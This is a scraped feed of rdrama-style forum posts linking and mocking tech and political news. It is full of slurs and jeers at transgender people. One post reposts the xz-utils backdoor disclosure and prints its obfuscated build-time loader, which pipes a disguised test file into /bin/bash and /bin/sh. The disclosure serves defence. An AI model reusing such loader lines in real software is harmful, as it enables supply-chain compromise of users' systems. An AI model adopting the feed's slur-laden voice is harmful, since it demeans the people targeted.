None

:marseysnoo:

https://old.reddit.com/r/groomercordapp/comments/1brxqrp/groomercord_to_start_showing_ads_for_g?sort=controversial*mers_to_boost/

https://old.reddit.com/r/technology/comments/1brxt4u/groomercord_to_start_showing_ads_for_g?sort=controversial*mers_to_boost/

:marseymouse:

https://lemmy.world/post/13762503?scrollToComments=true


archive

None
78
LPT that *they* don't want you to know

https://preview.redd.it/plae50pixnuc1.jpeg?width=988&auto=webp&s=08e70e494a7f3012085f0b6f64a209d7753bd985

Look how afraid they get:

Your first ninety minutes rather than days, I dare say. CTO here, you pull that trick and not only are you out of the door but you fly out with a charge of vandalism, sabotage and theft.

None
32
(real)
None
92
:marseyl: :marseypajeet:
None

You gotta understand though, they've only got 160 million per year to spend, you have to prioritize.

None

Maybe.... maybe Mao was right about the influence of academics...

https://i.rdrama.net/images/17134587880797524.webp

None
None
45
Too soon

Palestinian lives matter

None
44
Hackernews discusses if npr is just a wing of the dnc
None
19
:marseychonkerindignant2: :!marseyjourno:
None
31
Making Truth Social Comply with the AGPL

Orange Site discussion

tl;dr: some leftoid bullied Truth Social into releasing their source code as per the AGPL which requires derivative source to be published, naturally he's very proud of himself

He also implies the code is shit and people should look for vulnerabilities (to report them responsibly, I'm sure)

Flagged comments:

(make an account and enable "show dead")

Could have done without all the left-wing whining.

The dispersal from left-leaning social media sites wasn't about needing a place to tell lies, moderation on them was ideologically driven and biased, much like the author of this piece.

Nobody likes to be censored, the left has just been doing the censoring for so long they've forgotten how it feels.

This comment and any others critiquing the author or supporting Truth Social will be flagged, effectively deleting them for anyone who doesn't toggle the flag on in settings. What a great site this is. Actually worse than reddit in this regard.

https://news.ycombinator.com/item?id=40028696

The tone of this article reads like the author expected this company to be evil incarnate, because they're Republican, and then they just...aren't.

Seems like there is some cognitive distortion going on where people are being vilified, and then that ends up not matching reality.

https://news.ycombinator.com/item?id=40028668

None
41
Pure, distilled, blue-meth autism vs. Something about Chinx and Linux

4chan explains it better

https://i.rdrama.net/images/1712087897028019.webp

!nooticers you need to nootice harder

None
183
NYC creates AI chatbot to help people understand NY law and it immediately starts telling people to break the law

Great thread from Kathryn Tewson about how rslurred this thing is

Based AI telling employer to take worker's tips lmao

https://i.rdrama.net/images/17117284401529386.webp

None
None
None

== Compromised Release Tarball ==

One portion of the backdoor is solely in the distributed tarballs. For

easier reference, here's a link to debian's import of the tarball, but it is

also present in the tarballs for 5.6.0 and 5.6.1:

https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63

That line is not in the upstream source of build-to-host, nor is

build-to-host used by xz in git. However, it is present in the tarballs

released upstream, except for the "source code" links, which I think github

generates directly from the repository contents:

https://github.com/tukaani-project/xz/releases/tag/v5.6.0

https://github.com/tukaani-project/xz/releases/tag/v5.6.1

This injects an obfuscated script to be executed at the end of configure. This

script is fairly obfuscated and data from "test" .xz files in the repository.

This script is executed and, if some preconditions match, modifies

$builddir/src/liblzma/Makefile to contain

am__test = bad-3-corrupt_lzma2.xz

...

am__test_dir=$(top_srcdir)/tests/files/$(am__test)

...

sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

which ends up as

...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " -_" " _-" | xz -d | /bin/bash >/dev/null 2>&1; ...

Leaving out the "| bash" that produces

####Hello####

#��Z�.hj�

eval grep ^srcdir= config.status

if test -f ../../config.status;then

eval grep ^srcdir= ../../config.status

srcdir="../../$srcdir"

fi

export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh

####World####

After de-obfuscation this leads to the attached injected.txt.

== Compromised Repository ==

The files containing the bulk of the exploit are in an obfuscated form in

tests/files/bad-3-corrupt_lzma2.xz

tests/files/good-large_compressed.lzma

committed upstream. They were initially added in

https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

Note that the files were not even used for any "tests" in 5.6.0.

Subsequently the injected code (more about that below) caused valgrind errors

and crashes in some configurations, due the stack layout differing from what

the backdoor was expecting. These issues were attempted to be worked around

in 5.6.1:

https://github.com/tukaani-project/xz/commit/e5faaebbcf02ea880cfc56edc702d4f7298788ad

https://github.com/tukaani-project/xz/commit/72d2933bfae514e0dbb123488e9f1eb7cf64175f

https://github.com/tukaani-project/xz/commit/82ecc538193b380a21622aea02b0ba078e7ade92

For which the exploit code was then adjusted:

https://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89

Given the activity over several weeks, the committer is either directly

involved or there was some quite severe compromise of their

system. Unfortunately the latter looks like the less likely explanation, given

they communicated on various lists about the "fixes" mentioned above.

!chuds !nonchuds CHECK YO SELF. YEAR OF THE LINUX DESKTOP 2024 :marseysal:

None
None
Reported by:
None

Torn because he would be like omg ai

None

See also: Part 2

Spoiler: the :marseytrain: bans him :marseyscream:

Orange Site discussion

Edit:

The HN comments get to the core of this:

A moderator on Vaxry's groomercord changed a transgender person's pronouns from "they/them" to "who/cares". Vaxry did nothing about it, and even supported this change, stating that the person was making too big a deal about their pronouns

lmao based

Also someone posted screenshots from his Groomercord where he pings everyone asking for hentai:

https://i.rdrama.net/images/1712720418751131.webp

https://i.rdrama.net/images/1712720487026525.webp

https://i.rdrama.net/images/17127204875388856.webp

Reddit discussions:

https://old.reddit.com/r/linux/comments/1bzna16/hyprland_creator_vaxry_is_now_banned_from/?sort=controversial

https://old.reddit.com/r/linux/comments/1bztfry/fdos_conduct_enforcement_actions_regarding_vaxry/?sort=controversial

None
None
None
22
Boozecruisers are back in the driver seat

https://fortune.com/2024/04/18/mercedes-self-driving-autonomous-cars-california-nevada-level-3-drive-pilot/

None

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/?id=d5cf50dafc9dd5faa1e61e7021e3496ddf7fd61e

None
Link copied to clipboard
Action successful!
Error, please refresh the page and try again.